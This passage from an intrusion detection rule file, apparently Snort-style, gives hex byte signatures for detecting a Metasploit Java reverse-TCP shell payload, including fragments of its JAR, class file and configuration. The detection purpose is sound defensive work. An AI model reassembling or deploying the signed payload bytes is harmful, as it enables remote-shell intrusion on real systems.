e0 15 16 64 c6 64 f1 97 f5 75 75 e9 44 fd 0e a2 8e bb f1 4e 05 ef c2 bb 49 e3 5a 4b 65 05 ef c1 db 10 4a 83 79 04 63 9a a9 e0 bd 78 9f 82 f7 e3 03 22 ee 51 f0 f3 2c 8f 3c 0e 08 05 f7 c2 8f 88 c6 35 e9 5e 6d 07 a9 26 d4 9a 3d bd 0a 7e 01 8e 29 f8 45 1c 20 18 e4 fb 44 c1 07 99 87 50 1b 8b 93 1c 5f c2 01 d6 f2 21 05 9e 81 67 45 fc b2 82 5f c1 7d 14 27 cb 49 c7 5e 3d 96 cf e4 ab 2c f2 d7 70 3f 82 2b 6c 33 c2 f3 88 35 1e 10 71 50 c1 83 f8 75 05 bf 81 19 05 87 70 18 a1 64 b2 06 0f e3 23 0a 8e b0 34 b3 f2 a5 c9 8f 09 16 e4 51 04 ca |"; content:"| f0 b0 88 8f 29 f8 4d 24 eb 7a 27 db 90 84 e7 29 05 9e 67 b5 e5 1a cb 74 bd 9a d9 ad e0 b7 f1 3b 22 3e ae e0 13 38 aa e0 11 1c 15 f1 49 05 9f c2 a7 15 fc 2e 3c a9 c0 61 38 a4 c0 77 d8 65 96 49 6a e3 46 ad 9d 03 8a d3 ba 99 1f 61 a5 93 00 24 e2 f7 14 7c 06 be a5 e0 b3 f8 fd 09 22 b5 6d be 8a d0 ad e0 73 f8 03 11 7f a8 e0 f3 48 32 9d 91 0f ae 70 5f b4 bb 45 37 bb 8d 7c f8 b9 a2 dd 3d 06 e5 57 47 55 bf 82 3f c6 a3 08 65 e3 67 c6 f6 29 78 8c 7d ed 6a 6e 6f 5b d3 41 6a 2f a4 3f 1e ae 6c 0b 77 88 f8 82 82 2f e2 4b 0a be 8c af e4 24 4e ea 66 30 6c 44 b7 ea 26 1b 93 00 e8 1f 9f d6 53 db f5 d4 f8 e2 4f 15 fc 19 fe 5c c1 5f e0 2f 11 d4 71 74 db 36 ee 30 b6 ea 49 8a 72 ca 14 45 59 48 cf ad a9 99 4b 7c c2 a6 b6 45 6f d7 52 1a 79 58 4f 51 4e c5 b9 4c ee 55 05 8f e3 51 05 7f c5 e0 ca 0b 88 e0 d8 55 52 9c 4b bb 16 05 05 7e 00 3f a4 c3 41 05 7f 8d bf 51 f0 b7 f8 1a e5 fe 1c 34 26 5d 19 cc e0 81 9c 94 94 4d fa 28 8b ef 0c b6 eb a9 1e 4a 2e 76 66 2f 9f b8 56 9f 48 8c 2f 2b f8 3b 7c 3d 17 f2 e3 c7 |"; content:"| ae a3 f5 e5 86 7d 87 cc 9a b8 81 ef 97 b0 d1 97 8a ea b9 10 62 3b ae 5d d3 4c 09 a7 8b 60 13 0a 06 83 53 a8 46 29 33 04 1b 38 3d 74 c5 a3 9a a9 b3 e8 bf e7 e6 0f 0a fe 91 0d f4 27 fc b3 82 7f c1 bf 2a f8 06 fe 8d 4c c5 c7 7b 6d 1b d5 a6 d9 32 b5 0a be 89 6f 91 9b 69 94 22 57 3d ce 78 9d 99 c3 eb 14 cb 3c c1 cb d3 73 cb 13 e3 69 94 d7 ca ec 1c 5b cb d0 aa 1d cb b1 79 70 eb e8 4e 19 3b 6c dc 97 e5 1c d0 4e db f2 8c ff 77 42 22 fe 43 81 47 39 80 1e 83 47 e8 0e 0e a6 bb 15 38 0a c7 08 96 c1 cd f1 a4 02 3f e6 68 14 6a f5 7e d2 f9 05 78 51 c1 7f 72 b4 97 e6 23 4b 8b 6e 55 e0 25 78 59 c1 7f e1 3e 05 ff 0d 94 13 fe c3 bb 90 94 7e 1b df a1 78 a8 ad 15 f1 84 e2 00 32 95 03 f1 2d c5 e1 70 38 29 49 3a 04 c5 e1 72 b8 f9 4b 54 1c 92 c3 a3 38 64 47 91 e2 50 1c c5 8a a3 84 37 97 3a bc bc 30 8d 16 30 43 f7 8e 91 ae 4d 12 46 45 87 4f 71 94 39 a6 2b 0e bf 63 86 02 0f b3 ec 25 9c 2c 6a d3 7a 2f a1 d8 a4 5c 0f 23 96 46 5a bc 9f 24 e1 4b ce b2 57 b7 d1 a3 e7 02 68 3c 13 34 93 9f 38 2a e6 e4 67 b1 |"; content:"| 98 25 9b da f2 66 c5 2e 23 d5 aa 31 5d 99 ae f5 16 3d 9d 26 87 93 fb 02 05 af 6f 7f a0 70 49 20 d2 59 9b 8a 98 d2 7b 13 1a 03 74 46 a0 a1 a1 20 11 b7 46 89 3c 49 f1 57 7d 4a 55 83 7d 41 f1 9d 6a 1a b9 74 5b 46 fc d6 e8 69 2b 14 ea d3 b9 42 6d fe bb 5e ff f9 15 10 c1 c2 4e 01 b3 0a 57 48 ac 53 59 81 05 4e 93 09 23 4d da 15 91 04 d9 6b 77 27 f9 2f 4a ab a6 de a1 f7 f4 da e9 db 1d d3 13 94 8d ac ca 90 8a dc 52 da 5d bf 39 6d 24 fa 4c ca 54 66 37 d1 e9 d9 1a e3 aa e7 ec c0 c4 fa a4 b0 7d cb c6 31 bb 52 4b 77 67 ef 04 77 4a ef 31 b6 4f 2e bf ec fc 3f c1 90 d9 29 bb 74 6b d0 92 46 92 32 41 c2 16 c4 49 ca 21 5c 58 80 c2 29 d2 bc f0 ff a9 db 26 22 61 da f8 5c 53 d2 d4 b7 30 8c 25 8a 81 b4 4e c3 93 a0 ad 89 30 b6 5d 4b f4 e9 6d 5d bc a3 a9 20 e1 a2 74 be 77 fe 7f 09 c7 94 2b 66 37 6b 29 3d 69 da 7e f5 06 a6 d4 93 6e cb 93 5c ca 07 26 d7 e4 56 ca 34 52 74 ae 2a 70 aa 45 37 9f ca b3 cb 9a be a4 19 cf 85 e7 d8 c0 3f 21 3c b3 d3 8c 6a ca 75 f4 06 0a 14 7c 7a e4 4d 91 6d a2 ba 55 a8 4e |"; content:"| 26 56 13 40 3f 33 70 b2 30 e2 ad 56 79 9a db ea 9d 90 c5 75 8e 31 57 3a a1 eb f4 1a 11 02 ab 58 39 c5 0e 8d b6 64 63 7f dc 9c 20 c0 32 c3 48 e8 1a d7 8b 1d 91 76 7a 05 7a ac 8c c4 75 0a c2 25 81 77 7f 9f d8 85 77 be 8e 29 bd 2b 41 4e 0c da 14 d8 38 1d 6b d6 12 d5 b2 e6 29 1c 17 e7 6e da 02 07 c9 c1 f1 e4 76 2a 3e 10 2e 2a 10 24 1b 4e 31 4a c4 1d 5a 9c 52 72 ca ca 08 84 e1 d2 5e fb 3e a3 0b a8 23 65 e5 cb fc aa 72 67 da d4 c9 98 0e ae 01 fc 27 31 bd d3 e0 c0 1d 5f cd bb 20 17 73 f6 9d 6a af 26 eb 91 1a b0 3a b7 16 e5 3b 80 cc 91 f3 ed 78 a5 b6 d8 4e 58 13 5f c1 b3 f2 30 30 01 c2 85 df 51 85 81 5d 14 a5 4b c9 b4 4a b9 34 3f dd f4 7e 7b 40 62 65 b1 12 d8 b0 8c cd e3 b2 9e c5 64 36 1a 37 59 02 3b e9 e5 48 97 5c 96 55 81 92 cb 62 b0 20 d0 9c 5f 17 e5 dc 73 d2 62 c8 3a 54 3f 99 e8 78 9d b5 f8 a4 ec 1a 8c 44 c2 2e d6 ec 1b 90 e5 b7 b2 96 87 bf 56 f4 25 12 3b b3 ea b0 de 31 9d 5e ba ba 05 52 84 a6 42 58 26 35 9b df bd 1c 2c f8 d0 54 52 74 0d 26 b6 e7 48 4f 9f fa d3 81 c5 3f a9 ef |"; content:"| 68 4a 52 f9 |"; content:"| 8c 4e b9 dc c7 20 aa 9e 24 47 31 81 bc 7b 32 1f 67 16 92 f4 fe 78 da 24 de 42 6f 5f 9a 2e 14 cf 58 19 43 e9 b3 5b 4b b7 50 02 cc 79 dc ad 6f eb d3 12 e9 49 a9 3d 17 37 eb 73 41 60 5d 74 eb 68 8e 69 08 69 eb 6d ef ec 35 7a ad 67 51 96 78 43 b7 46 8b d8 40 85 76 a0 e1 5d aa 06 0f 65 9b 1e ca df f5 e6 94 eb 62 4c f3 ea ff 71 7f 4e 22 29 c6 93 31 bd 9f ef 1f 0e a6 26 56 b9 6f 73 3a 5b 9a cc 08 34 9d e4 4e 32 0d 96 b9 9e 7f 4c e2 93 f3 37 90 ec ee 84 9e dc c2 d7 b0 3b ca 6b a6 4d b2 81 91 d3 64 91 ce 33 48 b3 41 97 36 c7 44 63 eb a5 cd 4d e1 95 63 3f b4 e5 ad da 7c 9a 8d 1d 7a aa 41 4b e7 95 06 f9 7b 0a 88 07 67 42 37 0c 03 80 0c b3 b9 24 a5 af d9 5c 84 5a 3d d5 d8 56 7f 38 db 3f 66 cd 4b fc 53 03 20 7c db fa ad 57 e2 57 6c de e8 f1 09 a3 27 26 8c 46 f3 46 45 f4 75 04 9e a4 f6 29 1a 4d a3 9e de db e0 aa 1c 02 f7 01 6b 83 07 9e 86 ef 82 83 97 9d 06 b8 69 0b 38 c3 23 20 46 86 40 6a 1e 04 cf 11 28 f5 c9 c3 50 14 39 08 9e 01 70 d3 4c cb 08 28 b4 5a 5c 9d 81 12 6f ad 37 98 81 d2 |"; content:"| 0c 78 7d d3 a8 |"; content:"| c9 80 af b5 da 57 96 81 e9 21 41 15 46 a1 a4 4a 15 32 e0 e7 66 46 95 6f 66 06 66 85 5c aa 6b 14 36 f9 54 df ec 61 28 0f b9 55 77 06 4e eb 1c 81 39 91 2c 55 9e 38 9d e9 9d 61 d3 1b 82 b9 21 51 15 33 70 a6 b5 4b 15 55 d7 10 9c 15 92 aa 55 97 2a 0d c3 d9 16 d9 8a ce 2a df 39 aa 94 81 79 19 38 97 be 03 be f9 19 a8 1c 86 aa 3a 37 2d 30 5b d1 ef be 17 4f a3 15 bf 5b 88 0d 03 c9 5e d3 99 13 42 e2 93 13 85 90 a6 0a e1 b1 d8 7b 7c b5 cc 5e b6 07 35 fc 5d a4 16 65 80 ac 70 5e 67 75 8d 5a 44 22 8d c0 f9 11 55 1e 82 05 21 a5 4a 55 7c ef c9 c0 42 55 c9 c0 a2 61 a8 13 0f c1 05 11 a7 ef c2 61 b8 28 1c 11 7c a1 70 c4 a5 7a 88 57 38 e2 66 73 86 33 b0 38 54 ac 16 67 60 09 59 8c fb 8b a9 9f 0e 4b 87 e1 12 3a 3a 27 e2 54 8b e8 9c c5 90 8f ca 74 4e f5 84 43 25 ce ba 52 7f a9 5a 72 78 0f 2c 72 d6 79 fd 5e af bc 07 ce 51 4b fc a5 0b 48 b3 dd e0 1e 80 99 d9 51 fd 74 58 46 d4 76 79 71 e0 c4 4b bb 4a a9 7d 6a 00 63 aa 38 0a 77 db f6 65 5d a5 41 58 7e 27 44 07 a1 91 dd bf c2 76 7f a3 e5 fe 46 |"; content:"| a5 c2 21 58 19 |"; content:"| 71 0e 42 13 89 bb 4a 95 68 b8 9a 87 cd 34 6c e9 1c 20 8b 78 48 53 b7 ad 69 1b ab d9 ce b2 8a ac 5c 06 2e a3 1d 72 c8 c3 5a 87 69 9b 60 6d b3 17 3b 2d ae 3e db 1b dc 06 f9 63 00 46 ab 7c 1d be b5 59 87 4a 55 be 75 48 df 21 8f 5f ba 07 bc 83 d0 19 92 07 e1 f2 50 d1 00 5c ac 7a 46 a1 6c 04 22 e4 19 bf 34 04 eb 43 ca 00 cc 1e 81 0d 11 1e 5d 61 1b f6 ca 90 c2 dd fb d8 23 1b 43 32 77 9b 42 45 23 a0 e5 7c ef db 4c 3e af f2 45 d9 6f 95 b6 fb 7d b1 21 d0 e9 1c ed ed 22 79 43 c5 ce ba 12 7f 89 5a 4c e6 2e 53 8b e9 8b 16 b6 84 77 95 90 31 5f 1f 81 6e a2 12 57 65 b5 a8 ca 77 15 4b aa 16 0f c1 d6 03 e0 70 88 8e c5 8e a5 d0 4a fd 95 8e 4d b0 86 82 ef 7b f4 2f 50 44 ae a1 bc f0 0c 3c 6b 87 21 ac a5 39 91 fa a6 ca 9c 48 09 16 c9 96 85 62 ab 95 01 56 cd f8 12 a6 79 e1 51 29 e4 aa 51 5d 19 e8 89 d4 b9 1d f7 81 57 15 54 97 d3 4f 61 94 1c 38 f1 1a 87 de 22 3b d2 99 99 9b 58 7c 1f 9e 03 1f ff 18 63 b3 c3 f9 c4 ac 88 7a ff 08 18 91 aa 21 e8 0d b9 46 60 1b f1 4d 71 e0 8d 40 9a 3e cd 0c f4 |"; content:"| 8d c0 76 b2 d1 0e |"; content:"| ef 8f f8 76 0e c1 d5 ce 43 f0 fe 21 f8 00 43 e6 83 21 a9 e6 08 5c c4 62 5c 53 e7 f1 7b 48 28 99 02 54 ce c0 87 2a 2b 51 95 9d 7e 0f 3b f4 da 48 88 e4 fa f0 d8 b6 7b 4e 1c 1b 80 f2 9c 96 1f 21 0d 6b 6c 2d 87 01 ed dc f0 51 82 8a db b7 cb 9d 85 dc 75 8c c7 eb 6d 3c 5e 67 e1 f1 3a 02 d8 20 dc c0 f3 1f b3 e7 6f b0 e6 6f 20 cc 0d c2 8d 3c ff 71 7b fe 46 6b fe 46 0b b4 1e b7 05 5a d5 45 a7 ab 19 9d 42 16 bc 3e 4e 50 23 70 33 db f7 13 19 f8 e4 01 ce 97 e8 40 17 dc 34 c9 5f cf c3 8f b2 59 75 3d 19 d2 41 7d 2b 52 c2 bc 65 37 cc c9 2a 34 08 b7 72 0e f9 94 ad 12 a1 f7 d3 cd 55 47 26 af 7e 26 7f 75 14 24 72 f3 e9 fb 69 f4 d9 fd 96 d3 64 fe 95 25 cb a7 8a b8 70 f6 3e 23 4b 81 d1 49 21 b3 1b 24 df e7 06 c0 c5 80 65 52 b9 83 47 e1 58 f6 e0 02 12 5a a0 7e 1e d1 bd ad 05 5b 29 d5 dc be 1b 54 8e f7 ea 2a 62 45 59 ac 95 0c 7f fb 9d e0 c2 d6 9a dc f9 17 e0 c5 ec f9 87 e9 b4 9b fa 7d 23 70 07 31 de dd 4c 74 ee 6c a9 aa 76 52 3e b9 ab 93 63 a7 5a 58 30 08 77 53 94 30 9d 7b 76 43 03 75 |"; content:"| 5b 42 82 ef 5e c6 df |"; content:"| 7d 9c 80 4e bc e6 bb 3f 3b 38 8d 74 7c c0 b5 07 14 16 80 6e a2 b9 fb 69 62 0f e7 05 eb ba b8 ab 73 e0 c4 a3 59 15 43 82 b3 ce e5 77 f1 81 3d 50 e1 77 09 7b 41 51 c9 df 9f cf c0 de 4e 55 a8 f2 13 92 be 90 81 2f 76 ee 72 51 f0 bd 68 65 30 c1 4e d8 39 35 5e 82 97 6d 35 d0 43 6a 48 34 f7 36 9d 5f 52 e9 0d 96 d3 cd e5 bd 82 db d5 d8 52 e9 0d 65 60 60 e9 9c 7b e1 7a cb a6 d7 ce 11 36 d5 09 95 4e 3f 91 7b b0 85 4c fd 25 0e 8b dc c5 e7 a5 53 7b 89 4f 8b ea f2 0b 0b cb ef 07 d9 2f 08 9b c8 09 7e a1 4e c8 c9 ee a6 81 e8 a7 0b 8b f2 44 80 36 8a bc b1 84 3f 84 d8 c2 f2 fb e8 d3 6d cd b2 2e bb 44 92 ff 28 23 de b7 7a 00 2e 23 7e 0f 91 ae ef ad 24 ee 5f a6 53 75 95 e5 a4 e9 57 48 a0 72 66 64 7d fa 05 d7 5e 28 65 09 79 e2 c1 01 10 2a 5b 2a 49 b6 87 32 b0 8f 68 10 c0 ee 6e e1 f3 fb 56 bb ac 24 4b 38 17 2a c3 fb b3 45 c2 2b f0 93 6c ba 99 07 4e 0b be 8c 41 dc df 3c 02 ce 08 d9 5b 18 02 d7 63 16 dc 04 70 59 eb b9 f2 e2 a7 63 e5 44 bd 35 0f b0 c8 f7 d5 61 f8 da 20 ec cf c0 81 83 |"; content:"| e8 3b 48 a3 83 f0 75 |"; content:"| df 37 06 61 90 3c 7e 10 6e 19 a4 51 c6 fa 5c ee 1b b2 56 6f b5 93 12 fc 17 50 4b 03 04 14 00 00 00 00 00 57 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 03 04 14 00 00 00 08 00 57 6d b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 f3 4d cc cb 4c 4b 2d 2e d1 0d 4b 2d 2a ce cc cf b3 52 30 d4 33 e0 e5 f2 4d cc cc d3 75 ce 49 2c 2e b6 52 c8 4d 2d 49 2c 2e c8 c9 cf 2c d1 0b 48 ac cc c9 4f 4c e1 e5 e2 e5 f2 4b cc 4d 45 96 d3 87 ca e9 25 83 74 81 54 00 00 50 4b 03 04 14 00 00 00 00 00 57 6d b9 3e |"; content:"| 10 00 00 00 10 00 00 00 0e 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 53 70 61 77 6e 3d 32 0a 4c 50 4f 52 54 3d |"; content:"| 0a 50 4b 01 02 14 00 14 00 00 00 00 00 57 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 01 02 14 00 14 00 00 00 08 00 57 6d b9 3e f2 a1 d4 1c a7 10 00 |"; content:"| 00 f1 1f 00 00 |"; content:"| 00 00 00 00 00 00 00 00 00 00 00 00 00 29 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 50 4b 01 02 14 00 14 00 00 00 00 00 57 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 06 11 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 01 02 14 00 14 00 00 00 08 00 57 6d b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 2d 11 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 50 4b 01 02 14 00 14 00 00 00 00 00 57 6d b9 3e |"; content:"| 10 00 00 00 10 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 a9 11 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 50 4b 05 06 00 00 00 00 05 00 05 00 34 01 00 00 e5 11 00 00 00 00 |"; sid:1000039; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"java/shell/reverse_tcp"; flow:established; content:"| 50 4b 03 04 14 00 00 00 00 00 89 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 03 04 14 00 00 00 08 00 89 6d b9 3e f2 a1 d4 1c a7 10 00 00 f1 1f 00 00 18 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 95 58 0b 7c 53 e5 15 3f 27 b9 c9 bd b9 bd 6d 43 4a 80 4b 45 51 2b 86 be a2 0c aa 06 64 96 52 a4 d0 97 a4 50 03 3a b8 24 b7 34 92 e6 96 e4 16 8a db 9c db 50 e7 74 d3 bd 54 7c cb d8 ea dc d8 a0 6c 69 b5 82 7b 68 51 37 9d 9b 1b f8 da 53 f6 70 ee ed 74 4f 65 e7 dc 9b b4 69 1b 1c eb ef d7 ef bb df eb 3c ff e7 7c e7 cb d3 ef 3c 72 18 9c 50 e3 98 29 c3 4a f8 99 08 3f 17 e1 17 32 dc 04 bf 94 69 fa 55 19 86 e1 b8 08 bf 92 41 84 e3 1e e8 86 5f 4b f0 1b 99 fa df 8a f0 9a 0c 0a 1c e7 63 bf 93 e1 02 78 9d 87 bf 97 e0 0f dc ff 51 82 3f f1 ca 9f f9 e0 5f 64 f8 2b bc 21 c1 df 78 f0 a6 04 6f 49 f0 77 19 e6 c0 3f b8 f9 a7 08 ff e2 fe df 12 fc 87 fb 57 b9 79 9b 9b 77 98 cf 09 19 01 51 42 07 cd a0 93 07 82 84 2e 09 dd 44 0b |"; content:"| 45 99 56 3c c4 1c 65 1e 16 49 a8 f0 b6 62 6e 4a 44 2c 95 e1 7c f4 4a 38 8d 17 7d 34 80 37 64 2c c3 e9 22 fa 25 9c 41 d4 71 a6 84 b3 78 4a 95 71 36 96 73 73 9a 0b ac 3f f1 39 19 e7 e0 e9 4c e9 8c ec 14 c4 c8 00 38 97 9b 33 25 3c 4b c2 b3 45 ac f0 e0 39 38 8f 34 c5 73 45 0c f0 60 be 8c 95 58 25 62 b5 84 35 12 d6 32 cd a0 88 e7 91 49 f1 7c 09 17 48 f8 1e 09 17 7a 70 11 d6 71 73 81 88 17 ca 10 c1 8b 44 0c c9 b0 01 17 73 b3 84 1a 12 95 a6 cb b9 b9 58 c4 a5 12 be 57 c2 4b 24 ac 97 41 c3 65 dc 34 70 b3 5c c4 46 b6 d2 71 09 57 b0 3e 97 4a b8 92 8c 8d 4d ac f9 2a 11 57 cb 60 60 b3 88 2d 32 6c 23 3f 62 ab 0c 69 76 d9 36 6c 13 b1 5d c4 cb 44 5c 23 61 58 86 7e 78 55 c4 0e 19 76 e0 5a 19 b6 e3 3a 3e d7 c9 cd e5 84 00 8c 70 b3 5e c2 0d ac e8 15 12 5e c9 36 78 9f 84 1b b9 df 24 a1 c6 fd 66 09 a3 22 c6 44 d4 65 b8 19 bb 58 e1 2d 3c df cd 4d 5c c2 ab 58 c0 ad 12 26 b8 ef 91 30 c9 bd c1 06 ee 15 71 9b 0c 77 b0 60 dd 98 a2 2f 4c 7b 68 da 64 0d fb 24 dc ce 0e de 21 61 bf 8c 3b f1 6a 5e 7e 3f 2f 7f 80 70 |"; content:"| 1f e4 b9 6b f8 eb 43 bc eb 5a 6e 3e cc cd 47 b8 f9 28 37 bb b8 b9 8e 9b eb 25 bc 41 c6 45 f0 a6 07 3f 86 37 f2 cc c7 59 b6 9b 24 bc 99 fb 4f 48 f8 49 09 6f 91 f0 56 11 3f 85 20 b6 85 37 b6 d6 b7 34 22 f8 9a af d2 b6 6b c1 84 96 dc 12 0c 9b a9 78 72 cb 62 04 a9 bd be 63 e5 c6 70 63 3b 82 bb 29 bc b1 be e9 72 c2 e6 7a 7b b0 bc 2d 8c e0 59 55 bf ae 7e e3 ca 36 a6 30 2b 9a d0 d2 e9 8a 1e dd d4 d2 bd 09 23 6e 56 b4 6b 3b 13 86 16 43 98 96 47 bc 81 77 11 6d 4f 78 67 d2 ec d6 cd 78 94 98 db 47 79 53 45 dc a8 58 11 4f e8 08 73 26 4e 2e d7 4c ad 29 d9 db 67 92 74 ba d6 83 30 7b e2 7a 5b 9f 99 b7 38 53 4b a5 b4 9d 15 16 df 0a e6 5b 61 2b 45 b2 2f 89 27 e3 e6 52 04 67 60 fe 3a 04 a1 c1 88 11 33 a1 47 8b 27 11 66 04 36 4c b5 03 6f 93 1b fb a3 7a af 19 37 92 69 52 67 47 2a 6e ea 8d 3d 9b f5 58 4c 8f d9 d2 2e 0c 4c d1 71 2a 25 7b 26 6e 04 f9 0c d1 15 f1 d3 22 7e 86 6c b1 d9 30 cc b4 99 d2 7a 11 c2 81 b1 5d 79 ea 8e 1f cd d7 b3 00 8b 93 c8 ef dd a2 9b ab 52 7a 63 bf 1e ed 33 b5 cd 2c f1 bc 40 81 |"; content:"| 85 50 a0 68 b1 58 63 bf a9 27 d3 a4 3e 09 db 15 4f c6 9a 92 cb e3 a9 49 5a 4f 50 b2 00 d5 9c de 44 22 69 a4 7a b4 44 fc 6a 12 e3 ac c0 29 1c 10 63 f1 74 5a 8f 9a 08 e7 16 da be a1 90 d8 6e 1b 1f 08 e7 fc 0f 45 73 88 94 96 44 13 16 36 14 fc 2c fc 04 61 ee a4 2d ad 86 b9 c2 e8 4b c6 c6 a0 80 70 fa f8 96 56 c3 da b4 5c ef b2 37 a5 52 46 4a c1 cf e1 6d 0a 1c c1 db a9 81 27 11 a6 5b fb fb cc 78 22 d8 9e 32 7a f5 94 19 d7 d3 0a 7c 13 be 45 41 30 1e 39 b5 d9 c8 51 e0 15 16 64 c6 64 f1 97 f5 75 75 e9 44 fd 0e a2 8e bb f1 4e 05 ef c2 bb 49 e3 5a 4b 65 05 ef c1 db 10 4a 83 79 04 63 9a a9 e0 bd 78 9f 82 f7 e3 03 22 ee 51 f0 f3 2c 8f 3c 0e 08 05 f7 c2 8f 88 c6 35 e9 5e 6d 07 a9 26 d4 9a 3d bd 0a 7e 01 8e 29 f8 45 1c 20 18 e4 fb 44 c1 07 99 87 50 1b 8b 93 1c 5f c2 01 d6 f2 21 05 9e 81 67 45 fc b2 82 5f c1 7d 14 27 cb 49 c7 5e 3d 96 cf e4 ab 2c f2 d7 70 3f 82 2b 6c 33 c2 f3 88 35 1e 10 71 50 c1 83 f8 75 05 bf 81 19 05 87 70 18 a1 64 b2 06 0f e3 23 0a 8e b0 34 b3 f2 a5 c9 8f 09 16 e4 51 04 ca |"; content:"| f0 b0 88 8f 29 f8 4d 24 eb 7a 27 db 90 84 e7 29 05 9e 67 b5 e5 1a cb 74 bd 9a d9 ad e0 b7 f1 3b 22 3e ae e0 13 38 aa e0 11 1c 15 f1 49 05 9f c2 a7 15 fc 2e 3c a9 c0 61 38 a4 c0 77 d8 65 96 49 6a e3 46 ad 9d 03 8a d3 ba 99 1f 61 a5 93 00 24 e2 f7 14 7c 06 be a5 e0 b3 f8 fd 09 22 b5 6d be 8a d0 ad e0 73 f8 03 11 7f a8 e0 f3 48 32 9d 91 0f ae 70 5f b4 bb 45 37 bb 8d 7c f8 b9 a2 dd 3d 06 e5 57 47 55 bf 82 3f c6 a3 08 65 e3 67 c6 f6 29 78 8c 7d ed 6a 6e 6f 5b d3 41 6a 2f a4 3f 1e ae 6c 0b 77 88 f8 82 82 2f e2 4b 0a be 8c af e4 24 4e ea 66 30 6c 44 b7 ea 26 1b 93 00 e8 1f 9f d6 53 db f5 d4 f8 e2 4f 15 fc 19 fe 5c c1 5f e0 2f 11 d4 71 74 db 36 ee 30 b6 ea 49 8a 72 ca 14 45 59 48 cf ad a9 99 4b 7c c2 a6 b6 45 6f d7 52 1a 79 58 4f 51 4e c5 b9 4c ee 55 05 8f e3 51 05 7f c5 e0 ca 0b 88 e0 d8 55 52 9c 4b bb 16 05 05 7e 00 3f a4 c3 41 05 7f 8d bf 51 f0 b7 f8 1a e5 fe 1c 34 26 5d 19 cc e0 81 9c 94 94 4d fa 28 8b ef 0c b6 eb a9 1e 4a 2e 76 66 2f 9f b8 56 9f 48 8c 2f 2b f8 3b 7c 3d 17 f2 e3 c7 |"; content:"| ae a3 f5 e5 86 7d 87 cc 9a b8 81 ef 97 b0 d1 97 8a ea b9 10 62 3b ae 5d d3 4c 09 a7 8b 60 13 0a 06 83 53 a8 46 29 33 04 1b 38 3d 74 c5 a3 9a a9 b3 e8 bf e7 e6 0f 0a fe 91 0d f4 27 fc b3 82 7f c1 bf 2a f8 06 fe 8d 4c c5 c7 7b 6d 1b d5 a6 d9 32 b5 0a be 89 6f 91 9b 69 94 22 57 3d ce 78 9d 99 c3 eb 14 cb 3c c1 cb d3 73 cb 13 e3 69 94 d7 ca ec 1c 5b cb d0 aa 1d cb b1 79 70 eb e8 4e 19 3b 6c dc 97 e5 1c d0 4e db f2 8c ff 77 42 22 fe 43 81 47 39 80 1e 83 47 e8 0e 0e a6 bb 15 38 0a c7 08 96 c1 cd f1 a4 02 3f e6 68 14 6a f5 7e d2 f9 05 78 51 c1 7f 72 b4 97 e6 23 4b 8b 6e 55 e0 25 78 59 c1 7f e1 3e 05 ff 0d 94 13 fe c3 bb 90 94 7e 1b df a1 78 a8 ad 15 f1 84 e2 00 32 95 03 f1 2d c5 e1 70 38 29 49 3a 04 c5 e1 72 b8 f9 4b 54 1c 92 c3 a3 38 64 47 91 e2 50 1c c5 8a a3 84 37 97 3a bc bc 30 8d 16 30 43 f7 8e 91 ae 4d 12 46 45 87 4f 71 94 39 a6 2b 0e bf 63 86 02 0f b3 ec 25 9c 2c 6a d3 7a 2f a1 d8 a4 5c 0f 23 96 46 5a bc 9f 24 e1 4b ce b2 57 b7 d1 a3 e7 02 68 3c 13 34 93 9f 38 2a e6 e4 67 b1 |"; content:"| 98 25 9b da f2 66 c5 2e 23 d5 aa 31 5d 99 ae f5 16 3d 9d 26 87 93 fb 02 05 af 6f 7f a0 70 49 20 d2 59 9b 8a 98 d2 7b 13 1a 03 74 46 a0 a1 a1 20 11 b7 46 89 3c 49 f1 57 7d 4a 55 83 7d 41 f1 9d 6a 1a b9 74 5b 46 fc d6 e8 69 2b 14 ea d3 b9 42 6d fe bb 5e ff f9 15 10 c1 c2 4e 01 b3 0a 57 48 ac 53 59 81 05 4e 93 09 23 4d da 15 91 04 d9 6b 77 27 f9 2f 4a ab a6 de a1 f7 f4 da e9 db 1d d3 13 94 8d ac ca 90 8a dc 52 da 5d bf 39 6d 24 fa 4c ca 54 66 37 d1 e9 d9 1a e3 aa e7 ec c0 c4 fa a4 b0 7d cb c6 31 bb 52 4b 77 67 ef 04 77 4a ef 31 b6 4f 2e bf ec fc 3f c1 90 d9 29 bb 74 6b d0 92 46 92 32 41 c2 16 c4 49 ca 21 5c 58 80 c2 29 d2 bc f0 ff a9 db 26 22 61 da f8 5c 53 d2 d4 b7 30 8c 25 8a 81 b4 4e c3 93 a0 ad 89 30 b6 5d 4b f4 e9 6d 5d bc a3 a9 20 e1 a2 74 be 77 fe 7f 09 c7 94 2b 66 37 6b 29 3d 69 da 7e f5 06 a6 d4 93 6e cb 93 5c ca 07 26 d7 e4 56 ca 34 52 74 ae 2a 70 aa 45 37 9f ca b3 cb 9a be a4 19 cf 85 e7 d8 c0 3f 21 3c b3 d3 8c 6a ca 75 f4 06 0a 14 7c 7a e4 4d 91 6d a2 ba 55 a8 4e |"; content:"| 26 56 13 40 3f 33 70 b2 30 e2 ad 56 79 9a db ea 9d 